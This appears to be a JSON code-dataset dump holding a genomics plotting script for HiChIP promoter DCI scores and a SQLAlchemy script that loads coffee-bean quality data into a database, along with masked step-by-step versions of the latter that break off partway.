"step-5": "import sys,argparse\nimport os,glob\nimport numpy as np\nimport pandas as pd\nimport re,bisect\nfrom scipy import stats\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.size']=11\nimport seaborn as sns\nsns.set(font_scale=1.1)\nsns.set_style(\"whitegrid\", {'axes.grid' : False})\nsns.set_style(\"ticks\",{'ytick.color': 'k','axes.edgecolor': 'k'})\nmatplotlib.rcParams[\"font.sans-serif\"] = [\"Arial\"]\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams[\"mathtext.rm\"] = \"Arial\"\n\n\n\n# def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):\n\n# dci_file = '{}/{}/{}_{}{}.bed'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)\n# dci_df = pd.read_csv(dci_file,sep='\\t',header=None)\n# dci_df.columns=['chr','start','end','DCI']\n# dci_df.index = ['_'.join(ii) for ii in dci_df[['chr','start','end']].values.astype(str)]\n# return dci_df\n\ndef return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):\n\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file,sep='\\t',index_col=4)\n dci_df.columns=['chr','start','end','IfOverlap','score','strand','DCI'] \n return dci_df\n else:\n return None\n \n\ndef scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre):\n\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n \n test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_y,suffix)\n # print(test_file)\n if os.path.isfile(test_file): \n dci_df_wt_over_vector = return_dci_df(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']>dci_thre].index \n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']<-1*dci_thre].index \n \n dci_df_x = return_dci_df(DCI_dir,subdir,hm_mark,compr_x,suffix)\n dci_df_y = return_dci_df(DCI_dir,subdir,hm_mark,compr_y,suffix)\n\n # scatter plot\n plt.figure(figsize=(2.1,2.1))\n plt.scatter(dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI'],c='tab:grey',s=3,alpha=1,rasterized=True,label='All genes')\n plt.scatter(dci_df_x.loc[up_bins,'DCI'],dci_df_y.loc[up_bins,'DCI'],c='tab:red',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins,'DCI'],dci_df_y.loc[dn_bins,'DCI'],c='tab:blue',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$<{}$ in WT/Vector'.format(-1*dci_thre))\n \n # save and plot the correlation\n x,y = dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y) \n output_prename = '{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre)\n num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort,x_sort*slope+intercept,c = 'k',ls='--',lw=.8)\n plt.text(.97,.97,'$r={:.2f}$ '.format(r_value),fontsize=10,transform=plt.axes().transAxes,ha='right',va='top')\n \n plt.axhline(y=0,c='k',lw=1)\n plt.axvline(x=0,c='k',lw=1)\n # # plt.title('{} over {}'.format(cellType_labels[treatment],cellType_labels[control]))\n plt.legend(fontsize=10.5,borderaxespad=0.1,labelspacing=.1,handletextpad=0.1,\\\n handlelength=1,loc=\"upper left\",markerscale=3,bbox_to_anchor=[-0.12,1.36],frameon=False)\n xa,xb = cellType_labels[compr_x.split('_')[0]],cellType_labels[compr_x.split('_')[-1]]\n ya,yb = cellType_labels[compr_y.split('_')[0]],cellType_labels[compr_y.split('_')[-1]]\n 
plt.xlabel('DCI score ({} over {})'.format(xa,xb),fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya,yb),fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,subdir,hm_mark,compr_x,compr_y,suffix,dci_thre),\\\n bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)\n plt.show()\n plt.close()\n return up_bins,dn_bins\n return [],[]\n\n\n\n\ndef plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,flag):\n \n test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)\n \n if os.path.isfile(test_file): \n box_vals = []\n xticklabels = []\n sig_vals,sig_colors = [],[]\n for compr_col in ['WT_over_Vector','DEL_over_WT','EIF_over_DEL','TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir,subdir,hm_mark,compr_col,suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n # save the values in box plots\n dci_df.loc[selected_bins].to_csv('{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre,compr_col))\n s,p = stats.ttest_1samp(box_val,0)\n sig_vals.append('*' if p<0.05 else '')\n sig_colors.append('b' if s<0 else 'r')\n box_vals.append(box_val)\n xa,xb = cellType_labels[compr_col.split('_')[0]],cellType_labels[compr_col.split('_')[-1]] \n xticklabels.append('{} over {}'.format(xa,xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} s'.format(title.split()[2],compr_col)] = '{:.2f}'.format(s) \n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} p'.format(title.split()[2],compr_col)] = '{:.2e}'.format(p) \n \n #print(box_vals) \n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(.46*len(box_vals),2.2))\n g = plt.boxplot(box_vals,positions=positions,widths = .5,patch_artist=True,\\\n boxprops=dict(color='k',facecolor='w',fill=None,lw=1),\\\n medianprops=dict(color='k'),showfliers=False) \n # g = plt.violinplot(box_vals)\n \n # for position_id in np.arange(len(positions)):\n # scatter_x = np.random.normal(positions[position_id],0.06,len(box_vals[position_id]))\n # plt.scatter(scatter_x,box_vals[position_id],color=color,s=5,zorder=0,alpha=0.6,rasterized=True)\n \n # for compr_pos in [[0,1,'t'],[1,2,'t'],[2,3,'t']]:\n # mark_pvalue(compr_pos,positions,box_vals)\n plt.axes().set_xticklabels(xticklabels,rotation=30,ha='right',fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark),fontsize=13)\n # plt.ylim([-1,2])\n for ii in positions:\n plt.scatter(ii,np.median(box_vals[ii]),marker=sig_vals[ii],color='red',s=77)\n # plt.axes().text(ii,0,sig_vals[ii-1],fontsize=28,va='top',ha='center',color='red')\n plt.axhline(y=0,c='k',lw=1)\n plt.title(title,fontsize=12)\n # plt.legend(fontsize=16,borderaxespad=0.2,labelspacing=.2,handletextpad=0.2,handlelength=1,loc=\"upper right\",frameon=False)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre),\\\n bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)\n plt.show()\n plt.close()\n\n\n\n\n# ==== main() \n\ncellType_labels= {'Vector':'Vector',\\\n 'WT':'WT',\\\n 'DEL':'$\\Delta$cIDR',\\\n 'EIF':'UTX-eIF$_{IDR}$',\\\n 'TPR':'$\\Delta$TPR',\\\n 'MT2':'MT2',\\\n 'FUS':'UTX-FUS$_{IDR}$'}\n\n \noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir,exist_ok=True)\n\n# project_dir=\"/nv/vol190/zanglab/zw5j/since2019_projects/UTX_HaoJiang\"\nproject_dir=\"/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang\"\n# 
DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f2_DEG_promoter_DCI_non_normalized/f1_promoter_DCI_rename'.format(project_dir)\nDCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'.format(project_dir)\n# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f0_run_bart3d_new/bart3d_DCI_rename'.format(project_dir)\n# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/f1_deseq2_out'.format(project_dir)\n# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/fz_deseq2_out_combined'.format(project_dir)\n# deg_df = pd.read_csv('{}/deseq2_combined.csv'.format(expr_dir),index_col=0)\n\n\nsubdirs=['bart3d_dis200k_data_1st_submit','bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit','bart3d_dis500k_data202008']\n\ncompr_types = [['WT_over_Vector','DEL_over_WT'],['DEL_over_WT','EIF_over_DEL'],['WT_over_Vector','TPR_over_WT']]\nhm_marks = ['H3K4me3','H3K27ac']\nsuffixes=['_promoter_DCI']\ndci_thres = [2,5]\n\n\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]: \n outdir_tmp='{}/{}'.format(outdir,subdir)\n os.makedirs(outdir_tmp,exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins,dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre) \n \n # the box plot are exactly the same\n if compr_type[1]=='DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# up genes'] = len(up_bins) \n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# dn genes'] = len(dn_bins) \n \n ##### box plot\n selected_bins = up_bins\n color = 'tab:red'\n title = 'Genes w/ DCI$>{}$ \\n in WT over Vector'.format(dci_thre)\n plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'increased')\n \n selected_bins = dn_bins\n color = 'tab:blue'\n title = 'Genes w/ DCI$<{}$ \\n in WT over Vector'.format(-1*dci_thre)\n plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'decreased')\n \n\nnum_DCI_bins_df.to_csv(outdir+os.sep+'num_DCI_promoter_summary.csv')\n\n \n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import os
import sys
import logging.config
import sqlalchemy as sql
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Float, String, Text, Integer
import pandas as pd
import numpy as np
sys.path.append('./config')
import config
logging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(asctime)s - %(message)s')
logger = logging.getLogger(__file__)
Base = declarative_base()
class BeanAttributes(Base):
""" Defines the data model for the table `bean_attributes`. """
__tablename__ = 'bean_attributes'
id = Column(Integer, primary_key=True)
species = Column(String(100), unique=False, nullable=True)
owner = Column(String(100), unique=False, nullable=True)
country = Column(String(100), unique=False, nullable=True)
farm_name = Column(String(100), unique=False, nullable=True)
company = Column(String(100), unique=False, nullable=True)
region = Column(String(100), unique=False, nullable=True)
producer = Column(String(100), unique=False, nullable=True)
grading_date = Column(String(100), unique=False, nullable=True)
processing_method = Column(Text, unique=False, nullable=True)
aroma = Column(Float, unique=False, nullable=True)
flavor = Column(Float, unique=False, nullable=True)
aftertaste = Column(Float, unique=False, nullable=True)
acidity = Column(Float, unique=False, nullable=True)
body = Column(Float, unique=False, nullable=True)
balance = Column(Float, unique=False, nullable=True)
uniformity = Column(Float, unique=False, nullable=True)
cleancup = Column(Float, unique=False, nullable=True)
sweetness = Column(Float, unique=False, nullable=True)
total_cup_point = Column(Float, unique=False, nullable=True)
moisture = Column(Float, unique=False, nullable=True)
color = Column(String(100), unique=False, nullable=True)
cluster = Column(Integer, unique=False, nullable=True)
def __repr__(self):
return '<BeanAttributes %r>' % self.id
def persist_to_db(engine_string):
"""Persist the data to database.
Args:
engine_string (`str`): Engine string for SQLAlchemy.
Returns:
None.
"""
engine = sql.create_engine(engine_string)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# Delete all existing records in the table
if config.LOCAL_DB_FLAG:
try:
session.execute('''DELETE FROM msia_db.bean_attributes''')
except:
pass
else:
try:
session.execute('''DELETE FROM bean_attributes''')
except:
pass
# Read the data table and persist it into the database
raw_data = pd.read_csv(config.DATA_TABLE_PATH)
raw_data = raw_data.replace(np.nan, '', regex=True)
try:
for i in range(raw_data.shape[0]):
bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']),
species=str(raw_data.iloc[i]['Species']),
owner=str(raw_data.iloc[i]['Owner.1']),
country=str(raw_data.iloc[i]['Country.of.Origin']),
farm_name=str(raw_data.iloc[i]['Farm.Name']),
company=str(raw_data.iloc[i]['Company']),
region=str(raw_data.iloc[i]['Region']),
producer=str(raw_data.iloc[i]['Producer']),
grading_date=str(raw_data.iloc[i]['Grading.Date']),
processing_method=str(raw_data.iloc[i]['Processing.Method']),
aroma=float(raw_data.iloc[i]['Aroma']),
flavor=float(raw_data.iloc[i]['Flavor']),
aftertaste=float(raw_data.iloc[i]['Aftertaste']),
acidity=float(raw_data.iloc[i]['Acidity']),
body=float(raw_data.iloc[i]['Body']),
balance=float(raw_data.iloc[i]['Balance']),
uniformity=float(raw_data.iloc[i]['Uniformity']),
cleancup=float(raw_data.iloc[i]['Clean.Cup']),
sweetness=float(raw_data.iloc[i]['Sweetness']),
total_cup_point=float(raw_data.iloc[i]['Total.Cup.Points']),
moisture=float(raw_data.iloc[i]['Moisture']),
color=str(raw_data.iloc[i]['Color']),
cluster=int(raw_data.iloc[i]['cluster'])
)
session.add(bean_row)
logger.debug('Row %d added to table ' % i)
session.commit()
except sql.exc.IntegrityError: # Check primary key duplication
logger.error("Duplicated coffee bean")
except Exception as e:
logger.error("Incorrect credentials, access denied", e)
finally:
session.close()
if __name__ == "__main__":
# Obtain parameters from os
conn_type = "mysql+pymysql"
user = os.environ.get("MYSQL_USER")
password = os.environ.get("MYSQL_PASSWORD")
host = os.environ.get("MYSQL_HOST")
port = os.environ.get("MYSQL_PORT")
database = os.environ.get("DATABASE_NAME")
local_database_path = config.LOCAL_DATABASE_PATH
# If users wish to write to their own SQLALCHEMY_DATABASE_URI in the environment
if config.SQLALCHEMY_DATABASE_URI is None:
# Whether to create a local SQLite database or an AWS RDS database
if config.LOCAL_DB_FLAG:
engine_string = "sqlite:///{}".format(local_database_path)
else:
engine_string = "{}://{}:{}@{}:{}/{}".format(conn_type, user, password, host, port, database)
else:
engine_string = config.SQLALCHEMY_DATABASE_URI
try:
engine_string = 'sqlite:///data/bean.db'
persist_to_db(engine_string)
logger.info("Data successfully persisted into the database")
except Exception as e:
logger.error(e)
sys.exit(1)
|
normal
|
{
"blob_id": "76f2312a01bf8475220a9fcc16209faddfccd2ae",
"index": 9754,
"step-1": "<mask token>\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect 
credentials, access denied', e)\n finally:\n session.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('./config')\n<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\n<mask token>\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to 
table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-3": "<mask token>\nsys.path.append('./config')\n<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\nBase = declarative_base()\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n 
session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-4": "import os\nimport sys\nimport logging.config\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Float, String, Text, Integer\nimport pandas as pd\nimport numpy as np\nsys.path.append('./config')\nimport config\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\nBase = declarative_base()\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n 